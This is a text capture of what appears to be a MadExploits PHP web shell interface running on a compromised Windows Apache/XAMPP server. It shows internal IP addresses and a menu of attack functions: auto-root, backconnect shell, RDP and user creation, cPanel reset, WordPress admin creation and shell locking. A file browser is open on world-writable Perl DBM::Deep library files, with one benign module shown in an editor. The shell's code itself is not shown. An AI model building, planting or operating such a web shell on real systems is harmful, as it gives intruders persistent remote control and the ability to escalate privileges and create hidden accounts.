Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
DBM /
Deep /
[ HOME SHELL ]
Name
Size
Permission
Action
Engine
[ DIR ]
drwxrwxrwx
Iterator
[ DIR ]
drwxrwxrwx
Sector
[ DIR ]
drwxrwxrwx
Storage
[ DIR ]
drwxrwxrwx
Array.pm
9.76
KB
-rw-rw-rw-
ConfigData.pm
5.38
KB
-rw-rw-rw-
Cookbook.pod
6.5
KB
-rw-rw-rw-
Engine.pm
11.06
KB
-rw-rw-rw-
Hash.pm
3.42
KB
-rw-rw-rw-
Internals.pod
11.48
KB
-rw-rw-rw-
Iterator.pm
1.18
KB
-rw-rw-rw-
Null.pm
1.14
KB
-rw-rw-rw-
Sector.pm
617
B
-rw-rw-rw-
Storage.pm
1.59
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Sector.pm
package DBM::Deep::Sector; use 5.008_004; use strict; use warnings FATAL => 'all'; use Scalar::Util (); sub new { my $self = bless $_[1], $_[0]; Scalar::Util::weaken( $self->{engine} ); $self->_init; return $self; } sub _init {} sub clone { my $self = shift; return ref($self)->new({ engine => $self->engine, type => $self->type, data => $self->data, }); } sub engine { $_[0]{engine} } sub offset { $_[0]{offset} } sub type { $_[0]{type} } sub staleness { $_[0]{staleness} } sub load { die "load must be implemented in a child class" } 1; __END__
Close